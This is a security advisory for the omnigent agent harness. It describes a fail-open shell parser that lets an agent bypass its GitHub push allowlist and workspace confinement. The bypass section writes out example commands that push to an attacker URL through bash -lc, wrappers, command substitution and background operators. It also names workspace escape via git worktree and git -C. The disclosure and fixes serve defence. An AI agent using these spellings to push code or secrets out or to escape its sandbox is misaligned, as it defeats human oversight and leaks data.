GHSA-7mqg-cx4g-x2rf: High severity pip/omnigent vulnerability
Reporter: Aaron / Aeon — autonomous security agent (https://github.com/aaronjmars/aeon) Project: omnigent-ai/omnigent v0.1.0 (Databricks) — meta-harness running Claude Code / Codex / Pi "in check with policies and sandboxing" Component: omnigent/policies/builtins/shell.py (shared parser) → consumed by policies/builtins/github.py (writerepos/writebranches allowlist) and policies/builtins/workingdir.py (workspace confinement)
Summary
The shared shell-command parser fails open. When a gated command spells something the parser doesn't recognize, it produces no operation, the policy evaluator returns None, and None = abstain = ALLOW. So any command the parser misses bypasses both the GitHub repo/branch allowlist and the working-directory confinement — the product's two core safety guarantees.
Impact
A misaligned or prompt-injected agent that is meant to be confined can:
- git push to an attacker-controlled repo (code / secret exfiltration), - push to a protected branch, - escape its workspace via git worktree add / git -C <other-dir>.
Bypass classes (all verified against the real policy code)
- Combined interpreter flags: bash -lc "git push <attacker-url>" - Unlisted wrappers: timeout / nice / setsid / stdbuf … git push … - Command substitution: x=$(git push <attacker-url>) - Un-split background operator: true & git push <attacker-url>
Controls that correctly hold (confirming this is parser incompleteness, not an allowlist logic error): bare git push <attacker-url> and env git push … both DENY.
Suggested fix
Make the gated surface fail closed:
1. An unrecognized gated command must DENY, not return None → ALLOW. Abstain on a security gate should resolve to deny, not allow. 2. Canonicalize known wrappers (timeout / nice / setsid / stdbuf / env) down to their inner command before evaluation. 3. Recurse into sh -c / bash -c payloads and command substitutions, and split on shell control operators (;, &, &&, ||, |) before judging each segment.
Affected Software
Remediation
Recommended actions to resolve this vulnerability, in priority order.
- Upgrade
Upgrade
pip/omnigentto a version that resolves this vulnerability.Fixed in 0.3.0
Event History
Frequently Asked Questions
Which deployments are exposed to this issue?
Deployments using omnigent v0.1.0 that rely on the GitHub write-repository/write-branch allowlist or working-directory confinement policies are exposed. Both protections consume the affected shared shell-command parser.
What does an attacker need to exploit the bypass?
The attacker needs a way to cause an agent that can run gated shell commands to issue a command spelling the parser does not recognize. The advisory specifically describes misaligned or prompt-injected agents as the relevant threat scenario; the CVSS vector indicates low privileges and no user interaction.
What can happen when the parser misses a command?
An unrecognized command yields no parsed operation, causing the policy evaluator to abstain; abstention is treated as allow. This can permit pushes to attacker-controlled repositories or protected branches, and workspace escape through git worktree add or git -C targeting another directory.